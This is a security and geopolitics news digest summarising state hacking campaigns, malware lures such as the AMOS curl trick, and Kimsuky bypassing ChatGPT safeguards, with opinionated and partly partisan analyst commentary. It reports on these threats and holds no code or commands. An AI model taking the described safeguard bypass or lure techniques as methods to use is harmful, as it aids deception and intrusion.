Monday, Sep 22, 2025 // (IG): BB // GITHUB // SN R&D
China’s Victory Day Parade Signals Strategic Shift: Military Show and Alliances Underscore Dual Messaging
Bottom Line Up Front (BLUF): China’s 3 September Victory Day parade in Beijing was more than a display of military hardware — it was a geopolitical performance aimed at two distinct audiences. Domestically, it sought to project unity and resilience amid economic uncertainty. Internationally, it delivered a forceful message of alignment with Russia and North Korea, underscoring China’s pivot toward an assertive, non-Western coalition in defiance of U.S.-led order. The parade’s dual narrative — reassurance at home, resistance abroad — reflects Beijing’s recalibrated posture as it leans into confrontation and eschews the "peaceful rise" rhetoric of the past.
Analyst Comments: The visual alignment of Xi, Putin, and Kim on Tiananmen Square sends an unmistakable signal: China is no longer pretending it can sit comfortably in both Western and revisionist camps. The military rollout — including DF-61 ICBMs, anti-ship hypersonics, undersea drones, and cyber warfare units — was a direct message to U.S. defense planners. But the deeper takeaway is political: China is now comfortable openly aligning with sanctioned, authoritarian regimes like Myanmar and Zimbabwe, using non-alignment as a shield while tacitly building a counterweight to Western influence. That said, this assertiveness risks overreach. The domestic message of inevitable triumph will be harder to sustain if economic headwinds worsen, and internationally, Beijing may accelerate the very coalition-building it hopes to fragment. Xi’s invocation of WWII cooperation in a call with Trump days later suggests that even China knows it can’t entirely abandon engagement.
FROM THE MEDIA: While the parade emphasized domestic confidence through slogans like “People shall prevail,” its real audience was global. The joint appearance of Xi Jinping, Vladimir Putin, and Kim Jong-un — described by analysts as an “axis of upheaval” — telegraphed a rejection of Western dominance. Beijing showcased weapons systems like DF-61s and anti-ship hypersonics tailored to counter U.S. assets in the Indo-Pacific. The messaging was nuanced: China framed the event as anti-fascist, not anti-Western, to appeal to Global South leaders. But with India’s Modi absent and Japan pushing against participation, regional tensions were on full display. Beijing’s later reference to WWII cooperation with the U.S. suggests a continued effort to balance assertiveness with diplomatic maneuvering.
READ THE STORY: The Interpreter
Leaked Documents Reveal China’s Global Firewall Expansion: Censorship Tech Found in Four Nations
Bottom Line Up Front (BLUF): A trove of leaked documents confirms that China is exporting its internet censorship and surveillance infrastructure — known as the “Great Firewall” — to authoritarian regimes worldwide. Geedge Networks, a Chinese tech firm led by Fang Binxing (the Firewall’s original architect), has deployed these capabilities in Pakistan, Myanmar, Kazakhstan, and Ethiopia. These tools enable mass surveillance, traffic decryption, and content suppression — and point to a broader campaign to entrench CCP-style information control globally.
Analyst Comments: The global proliferation of Chinese surveillance infrastructure should set off alarms across the U.S. and allied intelligence communities. This is not just authoritarian tech-for-hire — it’s the codification of Beijing’s strategic vision: security through suppression. Geedge’s export model fits squarely within the Belt and Road Initiative, revealing that information dominance is now part of China’s soft power toolkit. As former NSC official Matt Pottinger put it, the fact that Washington has done “very little” to counter this speaks to a dangerous complacency. These systems are already operational in conflict zones and are used to silence dissent. If allowed to continue unchallenged, the CCP’s digital authoritarianism will bleed into the global commons, eroding norms around privacy, encryption, and free expression.
FROM THE MEDIA: These capabilities go far beyond traditional “lawful intercept” tools, including countrywide network tapping, mobile communications monitoring, and decryption of encrypted traffic. In Ethiopia, Geedge tools were reportedly used during the Tigray conflict and to suppress religious protests. Myanmar’s junta used similar tech to monitor and arrest citizens for anti-regime content on social platforms like Telegram and TikTok. While Vice President J.D. Vance criticized European speech laws in a recent speech, the Trump administration has remained largely silent on China's digital repression abroad. Analysts warn that U.S. inaction enables the spread of CCP influence and normalizes surveillance-driven governance.
READ THE STORY: The Dispatch
Russia, China, and Iran Exploit Charlie Kirk Shooting in Coordinated Disinformation Push
Bottom Line Up Front (BLUF): In the wake of Charlie Kirk’s assassination at Utah Valley University, state-linked media and online influence networks from Russia, China, and Iran have launched a coordinated disinformation campaign blaming foreign adversaries like Ukraine, Israel, and U.S. political factions for the killing. Despite clear evidence that the shooter acted alone, these narratives aim to exploit American political divisions, erode trust in democratic institutions, and divert global attention from their own domestic and geopolitical controversies.
Analyst Comments: This is textbook exploitation of a domestic crisis by foreign influence actors. The volume, speed, and thematic alignment across Russian, Chinese, and Iranian media indicate more than opportunism—this is information warfare at scale, designed to inflame U.S. culture wars and undermine confidence in U.S. stability. The inclusion of fabricated FEC screenshots and coordinated amplification via known ops like Russia’s Operation Overload points to sustained cross-platform manipulation. With the closure of the State Department’s R/FIMI disinfo hub, monitoring of such activity may now rely more heavily on independent researchers and private-sector threat intel teams.
FROM THE MEDIA: According to NewsGuard, over 6,000 mentions of Kirk’s death appeared in Chinese, Russian, and Iranian media in the week following the event, many containing false or misleading claims. The Institute for Strategic Dialogue linked much of this activity to Operation Overload, a known Russian influence campaign using fake news stories, AI-generated images, and inflammatory content to exploit social divisions in the U.S., targeting both conservative and LGBTQ+ audiences. This incident underscores how adversarial states continue to hijack domestic American tragedies to deepen political polarization, erode institutional trust, and discredit democratic governance—often moving faster than U.S. response capabilities, especially following the recent dismantling of the State Department’s R/FIMI disinformation monitoring hub.
READ THE STORY: Forbes
China’s “Safe China” Security Model Gains Global Traction, Challenging Western Norms
Bottom Line Up Front (BLUF): China is exporting its internal security model—centered on high-tech policing, mass surveillance, and political control—through its Global Public Security Cooperation Forum, held annually in Lianyungang. The 2025 event attracted over 2,000 participants, including officials from Interpol and governments across the Global South. China is positioning its surveillance-driven “Peaceful China” framework as a global standard for public safety, offering an alternative to the U.S.-led security paradigm, particularly in countries seeking to suppress dissent under the banner of stability.
Analyst Comments: This isn’t just soft power—it’s surveillance diplomacy. The real headline is that Beijing is building a parallel global security architecture, not through tanks or treaties, but through camera networks, predictive policing software, and crime index rankings. For autocrats and fragile democracies, China’s model offers turnkey repression—efficient, high-tech, and plausibly deniable. What’s alarming is not that dictators want this—it’s that it’s increasingly palatable to democratically elected leaders dealing with urban crime or unrest. Watch for growing export of Huawei surveillance systems, joint training programs, and normalized use of AI facial recognition as “public safety infrastructure.”
FROM THE MEDIA: While attention focused on Beijing’s military-hosted Xiangshan Forum, the Ministry of Public Security held its Global Public Security Cooperation Forum in Lianyungang. The event—now China’s flagship global security outreach platform—showcased AI-powered policing tools and Huawei's surveillance tech, which boasts the ability to track targets across bodycams and facial databases. Attendees toured state-of-the-art police academies and heard China's Public Security Minister Wang Xiaohong promote China as the world’s safest country, referencing its low violent crime and terrorism rates.
READ THE STORY: FT
Huawei Unveils Massive AI Clusters to Replace Nvidia, Push for Technological Autonomy
Bottom Line Up Front (BLUF): In response to U.S. sanctions and China's ban on Nvidia AI chip imports, Huawei has launched its most ambitious AI infrastructure to date, unveiling the SuperPoD Interconnect and two massive AI superclusters — Atlas 950 and Atlas 960. These systems use hundreds of thousands of Ascend neural processing units (NPUs) to match or exceed the performance of Western systems, including Nvidia’s NVLink-based platforms and Elon Musk’s “Colossus.” The move signals China’s accelerating shift from dependency to full-stack AI autonomy.
Analyst Comments: Huawei’s pivot from chip buyer to system builder shows how U.S. sanctions have backfired in the long run — galvanizing China to develop its supply chain at scale. While Ascend chips still lag Nvidia in single-chip performance, Huawei’s ability to cluster over a million NPUs using SuperPoD tech is a credible challenge to Nvidia’s hegemony. If validated, the Atlas 950’s 6.7x performance lead over Nvidia’s NVL144 is eye-catching — but the real story is scalability and control. With the CloudMatrix 384 surpassing Nvidia’s GB200 NVL72 in raw computing, Huawei will likely close the performance gap in the next few years. For Western analysts and supply chain strategists, this development reduces the leverage that export controls once provided.
FROM THE MEDIA: Following restrictions on Nvidia hardware purchases by Chinese firms, Huawei revealed several new AI infrastructure products, notably the Atlas 950 and Atlas 960 SuperClusters, powered by Ascend NPUs. The SuperPoD Interconnect enables up to 15,000 accelerators to work as one, similar to Nvidia’s NVLink. Huawei claims the Atlas 950 offers 1.3x the computing power of Elon Musk’s Colossus and that a node with 8,192 Ascend chips can outperform Nvidia's NVL144 by 6.7x. For its CloudMatrix 384 system, Huawei reports 300 petaflops of power—well above Nvidia’s comparable 180 petaflops NVL72 setup. The product line is Huawei’s answer to the increasing tech decoupling between China and the U.S., driven by national security concerns. The company aims to launch three more Ascend generations by 2028, each promising to double computing power.
READ THE STORY: RHC
China-Linked Hackers Impersonate Congressional Leader in Sanctions-Themed Phishing Campaign
Bottom Line Up Front (BLUF): Hackers tied to the Chinese cyber-espionage group APT41 impersonated Rep. John Moolenaar, chair of the House Select Committee on U.S.-China strategic competition, in a targeted phishing campaign aimed at law firms, think tanks, trade groups, and at least one foreign government. The emails included draft sanctions legislation to increase credibility, but embedded malware to gain access to sensitive systems — a direct attack on infrastructure and the legislative process itself.
Analyst Comments: This operation goes beyond the usual cyber espionage playbook. By co-opting the identity of a sitting congressional committee chair, China’s hackers exploited the trust-based, informal nature of U.S. policymaking. This wasn’t just about stealing data — it was about compromising credibility. Congress lacks centralized cybersecurity resources, and that decentralization is being weaponized. While the technical tools are familiar — spoofing, phishing, malware — the target is new: the core democratic process that underpins U.S. foreign policy. The fact that this campaign coincided with sensitive U.S.-China trade talks underscores its strategic intent. This is an escalation, and Washington should treat it as such.
FROM THE MEDIA: Using Moolenaar’s name and title, the hackers circulated draft sanctions legislation to external stakeholders — a move designed to trick recipients into opening malicious attachments or links. The timing aligned with high-stakes tariffs, semiconductors, and cloud restrictions negotiations. While no confirmed breaches have been reported, targeting external policy influencers — including law firms and think tanks — demonstrates a broader intelligence gathering strategy through institutional impersonation. Experts warn that this signals a shift in cyber operations: from attacking systems to mimicking the daily processes of democratic governance.
READ THE STORY: Forbes
Russian Jet Incursions and Airport Cyberattacks Heighten NATO Tensions
Bottom Line Up Front (BLUF): Russian military aircraft have again tested NATO’s resolve, with recent airspace violations over Estonia and drone incursions into Poland and Romania, prompting emergency responses and a U.N. Security Council meeting. At the same time, a cyberattack disrupted airport operations across Europe, with analysts suggesting likely Kremlin involvement. These incidents reflect Russia's widening hybrid warfare strategy, combining kinetic posturing and cyber sabotage to destabilize NATO and project power.
Analyst Comments: Aerial provocations — conducted without transponders, flight plans, or radio contact — are textbook attempts to normalize escalatory behavior and probe NATO response times. However, the timing of these incursions alongside a cyberattack targeting airport infrastructure strongly hints at a coordinated pressure campaign. Asymmetric tactics allow Russia to exert influence while maintaining plausible deniability, especially when paired with state-aligned hacker groups. With the Kremlin brushing off peace overtures and NATO scrambling interceptors regularly, the risk of miscalculation rises. The cyber dimension is more worrisome: airport disruptions tied to Collins Aerospace systems suggest focusing on chokepoints in civil infrastructure. The Cold War didn’t end — it migrated to the digital and gray zone space.
FROM THE MEDIA: This incident followed the alleged violation of Estonian airspace by three Russian MiG-31s, sparking Estonia’s first-ever request for an emergency U.N. Security Council meeting. In parallel, analysts linked a weekend cyberattack that disrupted flights at London’s Heathrow and other airports to Russia-aligned hacker groups, possibly targeting Collins Aerospace, which provides airport check-in tech. NATO officials confirmed the alliance is “at war with Russia in cyber every day,” underscoring how traditional airspace incursions are now paired with information warfare and cyber sabotage.
READ THE STORY: The Washington Times
Gamaredon and Turla Collaborating in Ukraine: Rare FSB APT Team-Up Increases Cyber Espionage Precision
Bottom Line Up Front (BLUF): Russian state-linked APT groups Gamaredon and Turla were observed collaborating on cyberattacks against Ukrainian targets between February and April 2025. ESET researchers found multiple co-compromised systems where Gamaredon first deployed access tools, later leveraged by Turla to install its Kazuar backdoor. This operational handoff marks the first technical evidence of direct coordination between these two FSB-affiliated threat actors.
Analyst Comments: This is a rare and significant moment in Russian cyber operations. Gamaredon (noisy, fast, and mass-scale) and Turla (stealthy, selective, and high-value) have historically operated in parallel — not in tandem. Their collaboration suggests strategic targeting where Gamaredon provides broad access, and Turla picks through the intelligence goldmine. While shared FSB origins have long been suspected to enable resource overlap, ESET’s telemetry offers hard evidence. Using Gamaredon implants to restart and deploy Turla’s Kazuar malware shows coordination and a clear division of labor. This fusion of speed and precision increases threat persistence and complicates attribution and response — especially for Ukraine’s already strained cyber defenses.
FROM THE MEDIA: In some cases, Gamaredon’s implants were used to restart or sideload Turla’s malware — indicating direct operational cooperation and historically tied to different FSB centers (Gamaredon to Center 18, Turla to Center 16), the two groups’ overlapping activity points to increased coordination within the Russian intelligence ecosystem. Researchers believe it’s highly likely that Gamaredon handed off access to Turla rather than both groups targeting the same system independently. ESET has published IoCs and malware samples tied to this operation.
READ THE STORY: Security Affairs
Cyber Spies Go High-Tech: North Korea Turns to ChatGPT for Phishing
Bottom Line Up Front (BLUF): North Korean APT group Kimsuky is using ChatGPT-generated deepfake military IDs in spear-phishing emails to target South Korean journalists, researchers, and human rights activists. According to cybersecurity firm Genians, the attackers bypassed AI content safeguards to generate convincing ID documents, weaponizing generative AI to enhance deception. This marks a further evolution in DPRK’s use of AI to augment espionage, influence, and cybercrime operations.
Analyst Comments: Kimsuky’s use of AI-generated ID cards is a tactical innovation with strategic implications. Where prior phishing relied on typos and crude graphics, this marks a shift toward AI-enhanced credibility engineering. The fact that attackers bypassed ChatGPT’s restrictions shows the limitations of current safeguards and the adaptive nature of threat actors. More troubling is how easily generative tools can be repurposed — from creating malware to building impersonation assets — with little technical overhead. For defenders, verifying authenticity can no longer stop at the visual or surface level. Validation must extend to metadata, document provenance, and behavioral context.
FROM THE MEDIA: The ID cards were convincingly realistic and generated with ChatGPT via obfuscated prompts. Genians noted that this deception tactic was part of a broader trend of AI-enabled cyber intrusions. U.S. officials have long linked Kimsuky to strategic intelligence collection, and recent campaigns show an expansion into financial crimes and disinformation. In 2025, Anthropic reported North Korean operatives using AI models like Claude to pass job interviews and infiltrate U.S. tech firms. The synergy between deepfake visuals, phishing, and malware delivery is part of Pyongyang's growing AI-powered offensive toolkit.
READ THE STORY: The 420
North Korean Hackers Expand Target Profile with BeaverTail Malware via ClickFix Phishing
Bottom Line Up Front (BLUF): North Korean threat actors — likely affiliated with the Lazarus Group — are now deploying BeaverTail and InvisibleFerret malware via ClickFix-style phishing lures targeting marketing, trader, and sales roles in the cryptocurrency and retail sectors. This marks a tactical shift away from exclusively targeting software developers. The latest campaign uses compiled malware across Windows, macOS, and Linux, distributed through fake Web3 hiring platforms.
Analyst Comments: Threat actors are banking on reduced operational awareness among non-engineering staff by shifting focus to less technical roles. Using compiled binaries for multi-platform deployment — paired with ClickFix tactics — emphasizes scalability and adaptability. The simplified version of BeaverTail suggests a more surgical data theft objective, with fewer browser targets and removal of broader collection capabilities. That may be a trial run for focused reconnaissance or credential harvesting.
FROM THE MEDIA: The campaign employed a fake Vercel-based hiring platform, capturing victim IPs and using fabricated technical errors to prompt OS-specific commands. This deployed a leaner variant of BeaverTail, an info-stealer first exposed in 2023. The malware now only targets eight browser extensions (down from 22) and focuses exclusively on Google Chrome. Windows variants leveraged password-protected ZIP archives to sideload InvisibleFerret, a Python-based backdoor. SentinelOne confirmed over 230 individuals targeted between January and March 2025 using similar job scams involving companies like Robinhood and Archblock. In parallel, DPRK groups such as APT37 have been seen using VCD ransomware, Rust-based implants (CHILLYCHINO), and advanced surveillance tools (FadeStealer) in increasingly multifaceted operations.
READ THE STORY: THN
Atomic Infostealer Campaign Targets macOS Users via Fake GitHub Repositories
Bottom Line Up Front (BLUF): A widespread malware campaign is using SEO-optimized fake GitHub repositories to distribute the Atomic macOS Stealer (AMOS), targeting macOS users searching for software like LastPass. Victims are tricked into running terminal commands that download and execute the stealer payload. The ongoing campaign is part of a broader trend exploiting trusted platforms (GitHub, Google Ads) to push malware to technically curious but unsuspecting users.
Analyst Comments: This is a sharp escalation in macOS-focused threat activity—AMOS is being repackaged and distributed at scale using cloned developer tooling ecosystems like GitHub. By spoofing names like “LastPass on MacBook” and using SEO poisoning, attackers are catching users where they search for help or downloads. The delivery vector—terminal commands with curl calls—is classic social engineering targeting power users. With GitHub often whitelisted in corporate environments, this poses a growing supply-chain-adjacent risk. Expect these campaigns to expand toward other high-value macOS software brands (e.g., 1Password, Docker, VS Code).
FROM THE MEDIA: LastPass has reported a widespread macOS infostealer campaign abusing GitHub to impersonate brands and deliver AMOS malware. Two fraudulent repositories using LastPass branding were discovered on September 16, posted by the user modhopmduck476, redirecting to macprograms-pro[.]com. Users were instructed to run a terminal command that initiates a curl request, downloads a malicious payload, and drops it into the /tmp directory.
READ THE STORY: SecurityWeek
Taiwan Defense Budget Surge Spurs Tech-Heavy Arms Expo, Porcupine Strategy in Focus
Bottom Line Up Front (BLUF): Taiwan’s defense spending will rise to 3.32% of GDP in 2026, signaling a rapid shift toward asymmetric defense in response to China's growing missile and drone arsenal. This year’s Taipei Aerospace & Defense Technology Exhibition—Taiwan’s largest to date—showcased uncrewed systems, cyber defense initiatives, and indigenous missile development, with high-profile foreign participation from Israel and the U.S. The event reflected Taiwan’s effort to harden its defenses through joint ventures, domestic innovation, and controversial workarounds to Missile Technology Control Regime constraints.
Analyst Comments: This exhibition was more than a trade show—it was strategic messaging. With participation from 14 countries and defense firms like Anduril and Kratos, Taiwan demonstrated its seriousness about implementing a porcupine strategy: saturating the battlespace with small, innovative, and survivable systems. Notably, the Chiang-Kong high-altitude air defense system and the growing presence of uncrewed maritime and aerial platforms show Taiwan is preparing for both missile salvos and gray-zone incursions. The island is also clearly testing the limits of MTCR restrictions, particularly in cooperation with Israeli defense firms, drawing U.S. scrutiny.
FROM THE MEDIA: Taiwan’s biennial defense exhibition (Sept 18–20) featured more than 400 exhibitors, including first-time returns by Elbit Systems of America and other Israeli firms, whose participation drew anti-Israel protests. The Ministry of National Defense (MND) emphasized asymmetric warfare, cybersecurity, and national mobilization under the All-Out Defense Initiative, supported by the All-Out Defense Mobilization Agency. MND sources didn’t rule out a surface-to-surface variant of Chiang-Kong, potentially challenging MTCR restrictions. Taiwan, while not a formal signatory, remains under U.S.-enforced compliance. China, meanwhile, continues to violate the regime while lobbying for inclusion. The exhibition reflects Taipei’s push for greater defense autonomy without abandoning key international partnerships.
READ THE STORY: ASPI
Items of interest
Trump’s Education Agenda Undermines Public Schools — But Americans Aren’t Buying It
BOTTOM LINE UP FRONT (BLUF): Despite aggressive efforts by Donald Trump and GOP allies to privatize K-12 education through school voucher expansion, public school enrollment has remained broadly stable. A recent Tulane University study found only a 3–4% increase in private school enrollment across states with new voucher programs since 2021, suggesting broad public support for public education remains intact — even as federal pressure mounts to dismantle it.
ANALYST COMMENTS: Trump's attacks on public education aren’t just budgetary — they’re ideological. The push for vouchers is part of a broader effort to weaken one of the last civic institutions where Americans interact across social and political divides. It’s no coincidence that public schools, long a target of authoritarian regimes, are under siege by a political movement that thrives on disinformation and division. The Trump agenda isn’t about parental choice — it’s about political control and ideological grooming. That said, resistance is real: the limited impact of vouchers, combined with teacher union pushback and state-level innovation like phone bans and project-based learning, shows the public school system is down but far from out.
FROM THE MEDIA: The Trump administration and allied Republicans have ramped up efforts to dismantle the Department of Education, cut federal education budgets, and expand school vouchers — disproportionately benefiting religious and affluent families. Yet a Tulane University analysis of 11 states that adopted voucher programs since 2021 shows only modest growth in private school enrollment. The programs often don’t cover full tuition, limiting access mostly to cheaper, faith-based schools. Meanwhile, public support for K-12 schools remains strong across party lines. Teachers’ unions, particularly the AFT led by Randi Weingarten, are responding with strategic plans to defend public education against political interference. Weingarten, labeled by former Secretary of State Mike Pompeo as “the most dangerous person in the world,” argues in her book Why Fascists Fear Teachers that public schools threaten authoritarianism by promoting critical thinking and civic engagement. Initiatives like school phone bans and collaborative, project-based learning reflect this mission — and may be key to resisting ideological capture.
READ THE STORY: FT
How Vouchers Affect Public Schools and Why It Matters (Video)
FROM THE MEDIA: In this episode of Don't IEP Alone, host Lisa Lightner delves into the intricacies of IDEA (Individuals with Disabilities Education Act) and the implications of public versus private education for children with special needs. Lisa provides a historical overview of IDEA's origins, linking it to a significant Pennsylvania court case that laid the groundwork for the legislation.
Private School Vouchers Hurt Our Students (Video)
FROM THE MEDIA: The 2025 House-passed budget reconciliation bill includes a national private school voucher proposal known as the Educational Choice for Children Act. The program would create a tax credit, giving away $5 billion per year of federal taxpayer dollars to fund private school voucher programs. Vouchers open the door to discrimination against students and hurt the public schools that serve the majority of children in this country.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.